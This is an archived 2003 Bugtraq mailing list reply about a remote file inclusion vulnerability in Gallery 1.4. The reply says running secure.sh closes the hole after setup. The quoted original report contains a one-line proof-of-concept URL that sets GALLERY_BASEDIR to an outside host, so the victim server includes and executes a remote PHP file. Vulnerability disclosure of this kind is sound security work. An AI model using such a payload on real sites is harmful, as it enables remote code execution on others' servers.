lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Date: Sat, 11 Oct 2003 13:41:47 -0500
From: "Brent Meshier" <brent@...hier.com>
To: "'Peter Stöckli'" <pcs@...tquest.com>,
	<bugtraq@...urityfocus.com>
Subject: RE: Gallery 1.4 including file vulnerability


The URL you mention is accessible only during the setup of Gallery.
Completing the installation, the user runs secure.sh or secure.bat which
"chmod 0 setup" making the vulnerability you mention inaccessible to the
web.

Brent Meshier
Global Transport Logistics, Inc.
2770 Fortune Circle Drive
Indianapolis, IN 46241
(317) 481-0527 x23 Direct
(317) 481-0177 Fax
http://www.gtlogistics.com/

-----Original Message-----
From: Peter Stöckli [mailto:pcs@...tquest.com] 
Sent: Saturday, October 11, 2003 11:13 AM
To: bugtraq@...urityfocus.com
Subject: Gallery 1.4 including file vulnerability

-Proof of concept-
It is possible to include any php file from a remote host, and execute
it on the target's server.
This works:
http://victim/path_to_gallery/setup/index.php?GALLERY_BASEDIR=http://tes
ter/
If the file "http://tester/util.php" exists, it will be included.

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ